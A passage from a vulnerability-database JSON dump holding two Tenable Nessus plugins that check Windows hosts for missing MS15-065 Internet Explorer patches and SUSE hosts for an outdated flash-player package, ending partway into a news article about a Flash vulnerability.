"CVE-2015-2425"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "id": "SMB_NT_MS15-065.NASL", "href": "https://www.tenable.com/plugins/nessus/84761", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84761);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2015-1729\",\n \"CVE-2015-1733\",\n \"CVE-2015-1738\",\n \"CVE-2015-1767\",\n \"CVE-2015-2372\",\n \"CVE-2015-2383\",\n \"CVE-2015-2384\",\n \"CVE-2015-2385\",\n \"CVE-2015-2388\",\n \"CVE-2015-2389\",\n \"CVE-2015-2390\",\n \"CVE-2015-2391\",\n \"CVE-2015-2397\",\n \"CVE-2015-2398\",\n \"CVE-2015-2401\",\n \"CVE-2015-2402\",\n \"CVE-2015-2403\",\n \"CVE-2015-2404\",\n \"CVE-2015-2406\",\n \"CVE-2015-2408\",\n \"CVE-2015-2410\",\n \"CVE-2015-2411\",\n \"CVE-2015-2412\",\n \"CVE-2015-2413\",\n \"CVE-2015-2414\",\n \"CVE-2015-2419\",\n \"CVE-2015-2421\",\n \"CVE-2015-2422\",\n \"CVE-2015-2425\"\n );\n script_bugtraq_id(\n 75626,\n 75631,\n 75636,\n 75677,\n 75679,\n 75687,\n 75689,\n 75690,\n 75745\n );\n script_xref(name:\"MSFT\", value:\"MS15-065\");\n script_xref(name:\"MSKB\", value:\"3065822\");\n script_xref(name:\"MSKB\", value:\"3075516\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/15\");\n\n script_name(english:\"MS15-065: Cumulative Security Update for Internet Explorer (3076321)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a web browser installed that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Internet Explorer installed on the remote host is\nmissing Cumulative Security Update 3076321. It is, therefore, affected\nby multiple vulnerabilities, the majority of which are remote code\nexecution vulnerabilities. An attacker can exploit these\nvulnerabilities by convincing a user to visit a specially crafted\nwebsite.\n\nHosts running Internet Explorer 10 or Internet Explorer 11 will not\nbe fully protected until both security update 3065822 and security\nupdate 3075516 are applied to the system. Security update 3075516\nmay require manual installation depending on your patching method.\n\nNote that the majority of the vulnerabilities addressed by Cumulative\nSecurity Update 3076321 are mitigated by the Enhanced Security\nConfiguration (ESC) mode which is enabled by default on Windows Server\n2003, 2008, 2008 R2, 2012, and 2012 R2.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2015/ms15-065\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Internet Explorer 6, 7, 8,\n9, 10, and 11.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-2425\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS15-065';\nkb = '3065822';\nkb2 = '3075516';\n\nkbs = make_list(kb,kb2);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\n# Some of the 2k3 checks could flag XP 64, which is unsupported\nif (\"Windows XP\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_sp_range(win2003:'2', vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nvuln = 0;\n\nif (\n #######################################\n # KB 3076321 (kb) #\n #######################################\n\n # Windows 8.1 / 2012 R2\n #\n # - Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", file:\"Mshtml.dll\", version:\"11.0.9600.17905\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 8 / 2012\n #\n # - Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", file:\"Mshtml.dll\", version:\"10.0.9200.17412\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.2\", file:\"Mshtml.dll\", version:\"10.0.9200.21523\", min_version:\"10.0.9200.21000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 7 / 2008 R2\n # - Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"11.0.9600.17915\", min_version:\"11.0.9600.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"10.0.9200.17412\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"10.0.9200.21523\", min_version:\"10.0.9200.21000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"9.0.8112.16669\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"9.0.8112.20784\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.18896\", min_version:\"8.0.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.23099\", min_version:\"8.0.7601.22000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2008\n #\n # - Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"9.0.8112.16669\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"9.0.8112.20784\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19652\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23707\", min_version:\"8.0.6001.23000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.19421\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.23728\", min_version:\"7.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23707\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.21481\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"6.0.3790.5662\", min_version:\"6.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n) vuln++;\n\n\n\nif (\n #######################################\n # KB 3075516 (kb2) #\n #######################################\n\n # Windows 8.1 / 2012 R2\n #\n # - Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", file:\"jscript9.dll\", version:\"11.0.9600.17923\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb2) ||\n\n # Windows 8 / 2012\n #\n # - Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", file:\"jscript9.dll\", version:\"10.0.9200.21531\", min_version:\"10.0.9200.21000\", dir:\"\\system32\", bulletin:bulletin, kb:kb2) ||\n hotfix_is_vulnerable(os:\"6.2\", file:\"jscript9.dll\", version:\"10.0.9200.17422\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb2) ||\n\n # Windows 7 / 2008 R2\n # - Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"jscript9.dll\", version:\"11.0.9600.17918\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb2) ||\n # - Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"jscript9.dll\", version:\"10.0.9200.21531\", min_version:\"10.0.9200.21000\", dir:\"\\system32\", bulletin:bulletin, kb:kb2) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"jscript9.dll\", version:\"10.0.9200.17422\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb2)\n) vuln++;\n\nif( vuln )\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T20:24:54", "description": "This update for flash-player fixes the following issues :\n\n - Security update to 11.2.202.621 (bsc#979422) :\n\n - APSA16-02, APSB16-15, CVE-2016-1096, CVE-2016-1097, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1101, CVE-2016-1102, CVE-2016-1103, CVE-2016-1104, CVE-2016-1105, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4109, CVE-2016-4110, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4116, CVE-2016-4117\n\n - The following CVEs got fixed during the previous release, but got published afterwards :\n\n - APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011, CVE-2016-1012, CVE-2016-1013, CVE-2016-1014, CVE-2016-1015, CVE-2016-1016, CVE-2016-1017, CVE-2016-1018, CVE-2016-1019, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1030, CVE-2016-1031, CVE-2016-1032, CVE-2016-1033\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-18T00:00:00", "type": "nessus", "title": "SUSE SLED12 Security Update : flash-player (SUSE-SU-2016:1305-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033", "CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:flash-player", "p-cpe:/a:novell:suse_linux:flash-player-gnome", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2016-1305-1.NASL", "href": "https://www.tenable.com/plugins/nessus/91217", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:1305-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91217);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1006\",\n \"CVE-2016-1011\",\n \"CVE-2016-1012\",\n \"CVE-2016-1013\",\n \"CVE-2016-1014\",\n \"CVE-2016-1015\",\n \"CVE-2016-1016\",\n \"CVE-2016-1017\",\n \"CVE-2016-1018\",\n \"CVE-2016-1019\",\n \"CVE-2016-1020\",\n \"CVE-2016-1021\",\n \"CVE-2016-1022\",\n \"CVE-2016-1023\",\n \"CVE-2016-1024\",\n \"CVE-2016-1025\",\n \"CVE-2016-1026\",\n \"CVE-2016-1027\",\n \"CVE-2016-1028\",\n \"CVE-2016-1029\",\n \"CVE-2016-1030\",\n \"CVE-2016-1031\",\n \"CVE-2016-1032\",\n \"CVE-2016-1033\",\n \"CVE-2016-1096\",\n \"CVE-2016-1097\",\n \"CVE-2016-1098\",\n \"CVE-2016-1099\",\n \"CVE-2016-1100\",\n \"CVE-2016-1101\",\n \"CVE-2016-1102\",\n \"CVE-2016-1103\",\n \"CVE-2016-1104\",\n \"CVE-2016-1105\",\n \"CVE-2016-1106\",\n \"CVE-2016-1107\",\n \"CVE-2016-1108\",\n \"CVE-2016-1109\",\n \"CVE-2016-1110\",\n \"CVE-2016-4108\",\n \"CVE-2016-4109\",\n \"CVE-2016-4110\",\n \"CVE-2016-4111\",\n \"CVE-2016-4112\",\n \"CVE-2016-4113\",\n \"CVE-2016-4114\",\n \"CVE-2016-4115\",\n \"CVE-2016-4116\",\n \"CVE-2016-4117\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"SUSE SLED12 Security Update : flash-player (SUSE-SU-2016:1305-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for flash-player fixes the following issues :\n\n - Security update to 11.2.202.621 (bsc#979422) :\n\n - APSA16-02, APSB16-15, CVE-2016-1096, CVE-2016-1097,\n CVE-2016-1098, CVE-2016-1099, CVE-2016-1100,\n CVE-2016-1101, CVE-2016-1102, CVE-2016-1103,\n CVE-2016-1104, CVE-2016-1105, CVE-2016-1106,\n CVE-2016-1107, CVE-2016-1108, CVE-2016-1109,\n CVE-2016-1110, CVE-2016-4108, CVE-2016-4109,\n CVE-2016-4110, CVE-2016-4111, CVE-2016-4112,\n CVE-2016-4113, CVE-2016-4114, CVE-2016-4115,\n CVE-2016-4116, CVE-2016-4117\n\n - The following CVEs got fixed during the previous\n release, but got published afterwards :\n\n - APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011,\n CVE-2016-1012, CVE-2016-1013, CVE-2016-1014,\n CVE-2016-1015, CVE-2016-1016, CVE-2016-1017,\n CVE-2016-1018, CVE-2016-1019, CVE-2016-1020,\n CVE-2016-1021, CVE-2016-1022, CVE-2016-1023,\n CVE-2016-1024, CVE-2016-1025, CVE-2016-1026,\n CVE-2016-1027, CVE-2016-1028, CVE-2016-1029,\n CVE-2016-1030, CVE-2016-1031, CVE-2016-1032,\n CVE-2016-1033\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=979422\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1006/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1011/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1012/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1013/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1014/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1015/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1016/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1017/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1018/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1019/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1020/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1021/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1022/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1023/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1024/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1025/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1026/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1027/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1028/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1029/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1030/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1031/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1032/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1033/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1096/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1097/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1098/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1099/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1100/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1101/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1102/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1103/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1104/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1105/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1106/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1107/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1108/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1109/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1110/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4108/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4109/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4110/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4111/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4112/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4113/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4114/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4115/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4116/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4117/\");\n # https://www.suse.com/support/update/announcement/2016/suse-su-20161305-1/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e82b824a\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP1 :\n\nzypper in -t patch SUSE-SLE-WE-12-SP1-2016-772=1\n\nSUSE Linux Enterprise Workstation Extension 12 :\n\nzypper in -t patch SUSE-SLE-WE-12-2016-772=1\n\nSUSE Linux Enterprise Desktop 12-SP1 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-SP1-2016-772=1\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2016-772=1\n\nTo bring your system up-to-date, use 'zypper patch'.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"flash-player-11.2.202.621-130.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.621-130.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"flash-player-11.2.202.621-130.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.621-130.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T10:06:53", "description": "[](<https://3.bp.blogspot.com/-GqLnLJ0erIQ/VoIpMsXEkQI/AAAAAAAAl_I/SZRl9xL7k8I/s1600/adobe-flash-player-security-patch-update.png>)\n\nAdobe has been one of the favorite picks of the Hackers to mess with any systems devoid of any operating systems, as Flash Player is a front runner in all the browsers.\n\n \n\n\nHackers have already been targeting Flash Player for long by exploiting known vulnerabilities roaming in the wild.\n\n \n\n\nDespite Adobe's efforts, Flash is not safe anymore for Internet security, as one more critical vulnerability had been discovered in the Flash Player that could crash the affected system and potentially allow an attacker to take control of the system.\n\n \n\n\nDiscovered by a French Researcher 